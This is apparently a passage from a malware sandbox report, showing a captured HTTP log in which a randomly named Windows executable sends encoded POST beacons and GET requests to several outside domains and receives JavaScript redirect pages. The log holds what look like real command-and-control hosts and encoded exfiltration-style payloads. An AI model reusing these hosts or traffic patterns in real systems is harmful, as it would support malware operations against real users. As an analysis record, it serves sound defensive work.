src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/vpqb/?40G=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov6UF8iHhIIfztFuddsJZKZ0jfG27BsUoTTDkyVdJYgiWFcO05IwORcvR&I6=x8CX&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#
Jan 11, 2025 09:36:39.938271999 CET	547	IN	Data Raw: 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 Data Ascii: ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/vpqb/?40G=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov6UF8iHhIIfztFuddsJZKZ0jfG27BsUoTTDkyVdJYgiWFcO05IwORcvR&I6=x8CX&f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	50005	13.248.169.48	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:44.996022940 CET	810	OUT	POST /0krx/ HTTP/1.1 Host: www.a1shop.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.a1shop.shop Referer: http://www.a1shop.shop/0krx/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 34 41 65 6e 51 65 49 30 59 56 2b 6b 71 49 57 6f 39 58 69 78 68 50 50 4d 6d 50 41 57 76 71 59 48 5a 48 5a 79 32 37 44 77 4b 73 34 2b 35 4d 4a 33 4f 37 57 48 2f 48 74 34 38 6c 6a 2b 76 69 59 79 36 75 77 64 41 4d 35 73 45 49 43 77 4a 76 63 38 66 42 6f 6b 6a 34 32 66 31 2f 32 47 45 67 6e 41 6d 62 52 4f 59 55 62 54 6c 62 79 74 48 71 45 62 39 54 45 44 6d 79 45 7a 71 48 34 61 56 7a 6d 6c 34 34 69 48 77 68 51 48 76 71 38 4f 36 42 53 6c 4d 71 66 72 37 7a 5a 79 34 30 49 78 4b 4c 6c 35 34 4e 53 46 59 50 77 65 5a 35 37 46 51 45 30 74 6a 4b 4d 77 2f 61 31 79 6a 69 76 4a 42 70 30 58 32 32 42 50 41 63 59 58 66 79 4c 31 58 69 52 70 46 67 3d 3d Data Ascii: 40G=4AenQeI0YV+kqIWo9XixhPPMmPAWvqYHZHZy27DwKs4+5MJ3O7WH/Ht48lj+viYy6uwdAM5sEICwJvc8fBokj42f1/2GEgnAmbROYUbTlbytHqEb9TEDmyEzqH4aVzml44iHwhQHvq8O6BSlMqfr7zZy40IxKLl54NSFYPweZ57FQE0tjKMw/a1yjivJBp0X22BPAcYXfyL1XiRpFg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	50006	13.248.169.48	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:47.554001093 CET	830	OUT	POST /0krx/ HTTP/1.1 Host: www.a1shop.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.a1shop.shop Referer: http://www.a1shop.shop/0krx/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 34 41 65 6e 51 65 49 30 59 56 2b 6b 72 70 6d 6f 78 55 36 78 67 76 50 50 69 2f 41 57 6d 4b 59 62 5a 48 64 79 32 2f 7a 65 4b 5a 6f 2b 67 70 74 33 50 36 57 48 79 6e 74 34 7a 46 6a 2f 72 69 59 74 36 75 73 6a 41 4f 39 73 45 49 47 77 4a 76 4d 38 66 79 77 6e 78 59 32 64 67 76 32 41 4a 41 6e 41 6d 62 52 4f 59 55 4f 49 6c 66 57 74 41 61 30 62 79 57 77 43 72 53 46 42 70 48 34 61 45 6a 6d 68 34 34 69 31 77 6b 35 63 76 75 4d 4f 36 42 69 6c 4d 66 7a 6f 78 7a 5a 6f 6c 45 49 36 44 4a 30 68 68 6f 75 65 56 5a 73 4b 64 2b 6a 4f 56 79 31 50 35 6f 41 63 68 4c 4e 4a 6e 67 4c 2f 57 50 70 69 30 33 46 58 4e 2b 73 32 41 46 75 66 61 77 77 74 54 58 6f 61 6e 58 30 30 50 30 33 62 33 61 79 64 54 38 50 4b 72 52 59 3d Data Ascii: 40G=4AenQeI0YV+krpmoxU6xgvPPi/AWmKYbZHdy2/zeKZo+gpt3P6WHynt4zFj/riYt6usjAO9sEIGwJvM8fywnxY2dgv2AJAnAmbROYUOIlfWtAa0byWwCrSFBpH4aEjmh44i1wk5cvuMO6BilMfzoxzZolEI6DJ0hhoueVZsKd+jOVy1P5oAchLNJngL/WPpi03FXN+s2AFufawwtTXoanX00P03b3aydT8PKrRY=
Jan 11, 2025 09:36:48.017807007 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	50007	13.248.169.48	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:50.117142916 CET	1843	OUT	POST /0krx/ HTTP/1.1 Host: www.a1shop.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.a1shop.shop Referer: http://www.a1shop.shop/0krx/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 34 41 65 6e 51 65 49 30 59 56 2b 6b 72 70 6d 6f 78 55 36 78 67 76 50 50 69 2f 41 57 6d 4b 59 62 5a 48 64 79 32 2f 7a 65 4b 5a 67 2b 38 50 78 33 4f 64 43 48 7a 6e 74 34 2b 6c 6a 36 72 69 5a 33 36 75 6b 6e 41 4f 78 38 45 4c 75 77 4c 4e 30 38 49 54 77 6e 6f 6f 32 64 69 76 32 42 45 67 6e 4a 6d 62 42 4b 59 55 65 49 6c 66 57 74 41 59 73 62 32 44 45 43 70 53 45 7a 71 48 34 4f 56 7a 6d 46 34 38 32 6c 77 6b 31 4d 76 64 45 4f 36 6c 4f 6c 4f 4a 48 6f 79 54 5a 32 6d 45 4a 36 44 4a 34 41 68 73 47 38 56 5a 77 67 64 35 48 4f 56 57 55 59 71 4a 4d 74 69 49 78 67 75 77 33 53 41 4f 4a 66 73 78 5a 64 4b 4f 67 74 4b 33 4b 69 55 41 63 63 47 69 5a 75 32 33 38 57 58 48 4c 50 6e 66 75 4e 4a 50 48 51 36 55 37 6a 54 4b 38 4e 65 59 30 62 4a 41 59 48 66 6f 52 33 47 46 41 69 6f 66 4b 43 45 2f 35 57 4c 54 43 6f 4d 69 69 65 49 53 74 45 48 4a 75 55 42 46 36 65 41 33 53 5a 4d 74 30 75 4f 68 52 70 56 36 65 45 5a 6f 51 6a 4e 76 4e 2b 36 6b 66 77 39 33 58 74 54 36 2b 57 6a 63 53 2b 30 52 56 6a 74 72 45 55 58 4f 61 31 73 32 [TRUNCATED] Data Ascii: 40G=4AenQeI0YV+krpmoxU6xgvPPi/AWmKYbZHdy2/zeKZg+8Px3OdCHznt4+lj6riZ36uknAOx8ELuwLN08ITwnoo2div2BEgnJmbBKYUeIlfWtAYsb2DECpSEzqH4OVzmF482lwk1MvdEO6lOlOJHoyTZ2mEJ6DJ4AhsG8VZwgd5HOVWUYqJMtiIxguw3SAOJfsxZdKOgtK3KiUAccGiZu238WXHLPnfuNJPHQ6U7jTK8NeY0bJAYHfoR3GFAiofKCE/5WLTCoMiieIStEHJuUBF6eA3SZMt0uOhRpV6eEZoQjNvN+6kfw93XtT6+WjcS+0RVjtrEUXOa1s2HoM7TZGsK+GJ/mFOMYgDWgtI2aOGG72qNHRD+fyNyYetRMDX+c01v9gGLZ7frwwPRmS/hWjiqltkmAwVCb120ldDEb3Lxv+9x62qHyy2oZJTvEUbnqo/WrE3uLhw6SCv/fSzN+3szZq6+YIinHnGbrGmm6arFzAeU1vTp9IIpDw5cKFdhhiV2N6Xf7vtVvw3RWCryMK5iTmmDaSEbQ/6FvKomMt5EoaOBYC8LRrX0h8wGy2oqSgrOn/Y5JENCdGBIhQocPhaEySS3IUPjVO0m4xTl9cIxQCOK6hUlvFXArIg1Gj0Hs+22bAMJQMUY340GqsaL/LWe2EcT9rp8qVSKnEUX7xWqmmSZyik32r+Xhvrka2RaMBAgl52FHRvS29Iy384a53Bnf+heamDaTOyMsAF/hHyOcc07UmGx2iABLM7gB664EwJfJO5eAfnau4AfhcIum6QvZIrI1PbYiCAoscx+0Nbnsvor7EYfY/CZQ5kYZJicK6PfLe0tSQBkjTCaFFOoMqbDQgbm6VzM6tst9NAiE6Pztgbj3Fw7DWAOhMfDBTXv/51bB5AXK3dZLRe0O/CFgMYW0epiGZpmPkaKqorF9eBaYc9Rnjn2zsdyvZ2IOq0qXfFgFikoitYt/OpSuBGQdt36R7oAFsEgLnrLfBKgvgV0iTCZL [TRUNCATED]
Jan 11, 2025 09:36:50.560429096 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	50008	13.248.169.48	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:52.649902105 CET	543	OUT	GET /0krx/?40G=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwOSNsfSyMlf4rPNeG2/89f69I6MEwndXqV58tlctS1+W0a+BwgVQz/Ju&I6=x8CX HTTP/1.1 Host: www.a1shop.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:36:53.098510027 CET	388	IN	HTTP/1.1 200 OK content-type: text/html date: Sat, 11 Jan 2025 08:36:53 GMT content-length: 267 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 30 47 3d 31 43 32 48 54 72 45 56 4e 57 79 78 72 35 32 53 6f 47 4f 78 6c 4c 4c 63 76 73 4e 42 6f 65 78 6d 64 79 39 4e 75 37 48 64 58 39 6c 52 37 73 77 41 4d 4c 6e 33 31 47 68 57 7a 58 2f 57 74 69 6f 5a 69 4c 67 6b 49 72 31 54 49 59 54 70 51 76 34 6c 66 51 34 54 77 4f 53 4e 73 66 53 79 4d 6c 66 34 72 50 4e 65 47 32 2f 38 39 66 36 39 49 36 4d 45 77 6e 64 58 71 56 35 38 74 6c 63 74 53 31 2b 57 30 61 2b 42 77 67 56 51 7a 2f 4a 75 26 49 36 3d 78 38 43 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?40G=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwOSNsfSyMlf4rPNeG2/89f69I6MEwndXqV58tlctS1+W0a+BwgVQz/Ju&I6=x8CX"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	50009	13.248.169.48	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:58.311119080 CET	810	OUT	POST /g2y0/ HTTP/1.1 Host: www.aiactor.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.aiactor.xyz Referer: http://www.aiactor.xyz/g2y0/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 31 4c 65 35 74 6f 69 6d 31 6b 44 31 42 57 48 41 76 55 6d 51 30 43 67 4c 33 52 78 39 42 66 77 64 41 49 79 44 69 36 6a 73 49 6b 59 2f 4c 6a 31 75 51 52 54 32 76 6a 65 4a 4f 6f 44 64 6c 4b 52 5a 49 4a 55 73 43 52 4e 53 6c 52 44 76 4c 4f 76 54 71 77 6a 48 48 7a 35 2f 47 74 76 32 4c 5a 68 2b 53 63 35 42 51 42 62 5a 6e 4f 69 4d 32 66 2b 75 49 64 67 59 31 52 64 71 30 33 32 31 53 4a 62 53 55 66 35 43 4f 59 45 38 69 75 49 4b 46 37 4c 58 31 65 54 57 52 58 5a 6d 72 36 37 42 62 39 2f 4f 71 42 4f 34 62 78 4a 34 62 32 72 67 78 36 4c 68 6e 56 32 5a 72 6d 52 7a 30 70 70 73 6e 6f 44 4b 78 47 63 72 77 78 6f 63 73 63 6c 61 6b 57 65 62 68 77 3d 3d Data Ascii: 40G=1Le5toim1kD1BWHAvUmQ0CgL3Rx9BfwdAIyDi6jsIkY/Lj1uQRT2vjeJOoDdlKRZIJUsCRNSlRDvLOvTqwjHHz5/Gtv2LZh+Sc5BQBbZnOiM2f+uIdgY1Rdq0321SJbSUf5COYE8iuIKF7LX1eTWRXZmr67Bb9/OqBO4bxJ4b2rgx6LhnV2ZrmRz0ppsnoDKxGcrwxocsclakWebhw==
Jan 11, 2025 09:36:58.694752932 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	50010	13.248.169.48	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:37:00.861638069 CET	830	OUT	POST /g2y0/ HTTP/1.1 Host: www.aiactor.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.aiactor.xyz Referer: http://www.aiactor.xyz/g2y0/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 31 4c 65 35 74 6f 69 6d 31 6b 44 31 43 32 58 41 74 33 2b 51 6c 53 67 49 72 42 78 39 49 2f 77 52 41 49 2b 44 69 37 57 78 4c 58 38 2f 4b 42 74 75 52 54 37 32 6f 6a 65 4a 46 49 44 45 71 71 51 62 49 4a 49 4b 43 54 5a 53 6c 52 58 76 4c 4c 44 54 72 48 33 49 46 6a 35 35 66 64 76 30 57 4a 68 2b 53 63 35 42 51 41 2f 7a 6e 4b 4f 4d 71 2f 4f 75 4f 34 4d 58 30 52 64 72 31 33 32 31 44 35 62 57 55 66 34 6e 4f 5a 59 47 69 74 67 4b 46 36 37 58 31 71 6e 56 49 6e 5a 67 76 36 36 74 4c 66 79 5a 69 52 62 44 58 54 64 46 57 31 7a 39 77 4d 4b 44 39 33 36 31 31 33 70 49 77 72 4e 61 77 4f 65 2f 7a 48 59 7a 39 54 63 39 7a 72 41 77 70 45 2f 66 33 4f 55 79 6c 55 57 46 50 4c 42 66 72 46 74 32 7a 31 53 53 74 47 6f 3d Data Ascii: 40G=1Le5toim1kD1C2XAt3+QlSgIrBx9I/wRAI+Di7WxLX8/KBtuRT72ojeJFIDEqqQbIJIKCTZSlRXvLLDTrH3IFj55fdv0WJh+Sc5BQA/znKOMq/OuO4MX0Rdr1321D5bWUf4nOZYGitgKF67X1qnVInZgv66tLfyZiRbDXTdFW1z9wMKD936113pIwrNawOe/zHYz9Tc9zrAwpE/f3OUylUWFPLBfrFt2z1SStGo=
Jan 11, 2025 09:37:01.304953098 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	50011	13.248.169.48	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:37:03.408435106 CET	1843	OUT	POST /g2y0/ HTTP/1.1 Host: www.aiactor.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.aiactor.xyz Referer: http://www.aiactor.xyz/g2y0/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 31 4c 65 35 74 6f 69 6d 31 6b 44 31 43 32 58 41 74 33 2b 51 6c 53 67 49 72 42 78 39 49 2f 77 52 41 49 2b 44 69 37 57 78 4c 58 30 2f 4b 79 6c 75 54 30 6e 32 70 6a 65 4a 47 49 44 42 71 71 51 61 49 4a 41 4f 43 54 46 6b 6c 53 76 76 61 64 58 54 69 54 62 49 50 6a 35 35 58 39 76 31 4c 5a 67 38 53 63 70 64 51 42 50 7a 6e 4b 4f 4d 71 38 57 75 4e 74 67 58 35 78 64 71 30 33 32 44 53 4a 61 78 55 66 67 52 4f 59 74 37 69 63 41 4b 45 61 72 58 79 4a 50 56 58 58 5a 69 68 61 36 31 4c 66 2f 65 69 52 47 34 58 53 70 6a 57 33 7a 39 38 73 48 70 67 57 6d 4e 72 6b 74 52 38 4b 30 36 6d 6f 43 59 79 45 4d 55 77 55 67 6c 76 71 77 35 6d 6e 4c 7a 69 4c 52 54 77 31 69 74 41 4c 41 47 36 44 6b 50 75 55 36 35 33 41 72 57 61 77 72 69 45 4d 6c 74 42 6a 68 6c 6b 74 46 6f 30 78 64 4c 30 75 45 4e 79 49 30 6b 54 42 64 7a 66 5a 6a 59 71 56 33 49 52 65 70 4e 7a 73 42 77 65 70 39 74 79 63 31 67 52 70 6b 65 72 4d 42 70 4c 58 6e 4e 4a 39 38 30 39 54 6e 59 56 7a 6f 46 78 63 46 6d 41 6d 31 41 56 48 38 4a 4e 69 68 61 52 4e 37 76 6b 50 [TRUNCATED] Data Ascii: 40G=1Le5toim1kD1C2XAt3+QlSgIrBx9I/wRAI+Di7WxLX0/KyluT0n2pjeJGIDBqqQaIJAOCTFklSvvadXTiTbIPj55X9v1LZg8ScpdQBPznKOMq8WuNtgX5xdq032DSJaxUfgROYt7icAKEarXyJPVXXZiha61Lf/eiRG4XSpjW3z98sHpgWmNrktR8K06moCYyEMUwUglvqw5mnLziLRTw1itALAG6DkPuU653ArWawriEMltBjhlktFo0xdL0uENyI0kTBdzfZjYqV3IRepNzsBwep9tyc1gRpkerMBpLXnNJ9809TnYVzoFxcFmAm1AVH8JNihaRN7vkPB84LL4Ofs+GP/MWwyAYP6blNHKASYxg3qxnI0qytgrET59+u1f/IQ1q1+4GqrQnUCJS3V0JmVBIstUpC6XmGJcL44TLpSHurgSblWPkk4P5pX9A898CsS9pIQLapKarrVs+nDLSWTRhDSYOHQZd+Uc3cTMyEAgrrxJnegIupH6G7vOTneh7ZfdkVYLRULzaIkQRGfweKzgpTmNDdGax6WAOlig71ZQVb6MMsWkGofNrnhb/IlfYGrA22sL6BDFW/mjdPnJCRRpzuOG1Q8lmRTH0YI0YtlW8mnK8a8rox+3GqNWChUD4pZ2rTqNz2KlLlDsPkl54PQu0O5JZLjlnDx4/afszHyhYZS6V0SDH9XDIst0q0xppI52tM4zK4EuxMy1RlUA4gJlYuI/iES6YY/Tq7hBIRA3B/PJaTppIUlwBGZSF1cN18ce1q9aeUCNSPycf/zLNokbOATWWrmzbMZtCv0QxyrSwArpoastFFSPQ/8cfFZLFAxoo2Nk0j29+/eYs5vyEZP/EAlfb/NlcEnL0YMfbNWafLFUkgy0KjEcIlb5F3k516ZVNluJwimVARrNvELIN3qt8ZTrsqe1GZXvFcqvwiRsh4BCaBSPtj2YNvZJlmx7nApWGTfOBpDLs0T352ZQJDyOfJlKimTD/FbwyUdUOD8NTCw5 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	50012	13.248.169.48	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:37:05.951148987 CET	543	OUT	GET /g2y0/?I6=x8CX&40G=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYFRZeOP0GfhrQZRrSAbT+Kmv6/SRHMYq+Ac5wEC2ErfnaeU3KKMi595E HTTP/1.1 Host: www.aiactor.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:37:06.430511951 CET	388	IN	HTTP/1.1 200 OK content-type: text/html date: Sat, 11 Jan 2025 08:37:06 GMT content-length: 267 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 36 3d 78 38 43 58 26 34 30 47 3d 34 4a 32 5a 75 63 53 30 67 6d 48 76 65 43 4c 54 75 6d 53 74 77 68 45 6f 68 53 67 7a 50 50 4a 34 57 37 43 78 31 62 76 50 63 6b 4d 45 62 6a 73 4c 51 79 6e 32 6d 6e 72 77 4e 37 58 67 75 59 6b 30 4b 66 59 52 4e 6b 4a 6d 70 42 66 71 62 66 7a 50 70 44 62 43 59 46 52 5a 65 4f 50 30 47 66 68 72 51 5a 52 72 53 41 62 54 2b 4b 6d 76 36 2f 53 52 48 4d 59 71 2b 41 63 35 77 45 43 32 45 72 66 6e 61 65 55 33 4b 4b 4d 69 35 39 35 45 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?I6=x8CX&40G=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYFRZeOP0GfhrQZRrSAbT+Kmv6/SRHMYq+Ac5wEC2ErfnaeU3KKMi595E"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	50013	172.67.162.39	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:37:11.487390995 CET	825	OUT	POST /arvb/ HTTP/1.1 Host: www.sitioseguro.blog Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.sitioseguro.blog Referer: http://www.sitioseguro.blog/arvb/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 55 44 34 77 70 47 50 4f 65 4f 4b 4c 50 36 34 74 45 78 71 61 54 30 54 7a 69 36 38 4d 2b 64 57 63 58 65 5a 72 31 74 4b 34 33 31 68 6d 4a 74 61 78 47 6d 6a 63 4e 38 75 6d 6c 66 42 37 30 2f 78 77 4a 58 49 57 35 6d 36 70 6a 79 68 33 73 53 6b 48 51 5a 41 57 71 4e 46 4f 61 4d 71 4b 72 77 59 65 50 6c 75 73 70 78 4a 53 32 6e 4d 72 46 42 70 45 72 6e 7a 6c 43 73 6c 35 78 32 77 42 78 42 57 43 52 62 44 35 68 75 77 47 63 57 47 74 34 74 71 44 6e 70 6b 39 59 49 55 59 51 55 72 58 78 67 6f 37 62 68 31 4d 46 6f 75 53 78 54 61 61 48 35 42 41 73 49 6a 68 43 46 76 58 30 32 77 49 66 46 75 47 62 74 4f 6d 38 30 6a 63 6d 2f 32 47 70 68 53 78 59 41 3d 3d Data Ascii: 40G=UD4wpGPOeOKLP64tExqaT0Tzi68M+dWcXeZr1tK431hmJtaxGmjcN8umlfB70/xwJXIW5m6pjyh3sSkHQZAWqNFOaMqKrwYePluspxJS2nMrFBpErnzlCsl5x2wBxBWCRbD5huwGcWGt4tqDnpk9YIUYQUrXxgo7bh1MFouSxTaaH5BAsIjhCFvX02wIfFuGbtOm80jcm/2GphSxYA==
